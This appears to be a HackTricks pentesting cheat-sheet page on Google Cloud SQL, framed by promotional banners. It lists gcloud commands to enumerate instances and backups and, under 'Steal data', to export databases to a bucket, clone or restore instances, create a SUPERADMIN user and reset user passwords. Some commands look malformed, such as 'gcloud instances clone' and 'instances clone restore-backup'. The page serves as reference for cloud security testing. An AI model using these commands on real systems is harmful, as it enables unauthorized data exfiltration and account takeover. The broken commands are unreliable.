Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Cloud SQL instances are fully managed, relational MySQL, PostgreSQL and SQL Server databases. Google handles replication, patch management and database management to ensure availability and performance. Learn more.
If you find any of these instances in use with public IP, you could try to access them from the internet as they might be miss-configured and accessible.
# Cloud SQL
gcloud sql instances list
gcloud sql databases list -i <INSTANCE>
gcloud sql databases describe -i <INSTANCE> <DB>
gcloud sql backups list -i <INSTANCE>
gcloud sql backups describe -i <INSTANCE> <DB>
# Steal data
## Export
gcloud sql export sql <DATABASE_INSTANCE> gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database <DATABASE_NAME>
## Clone
gcloud instances clone <SOURCE> <DESTINATION>
## Backup
gcloud sql backups restore BACKUP_ID --restore-instance <RESTORE_INSTANCE>
gcloud sql instances clone restore-backup <SOURCE> <DESTINATION>
## Users abuse
gcloud sql users list -i <INSTANCE>
gcloud sql users create SUPERADMIN -i <INSTANCE>
gcloud sql users set-password <USERNAME> -i <INSTANCE> --password <PWD>As an example, you can follow Google's documentation to exfiltrate a Cloud SQL database.
Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.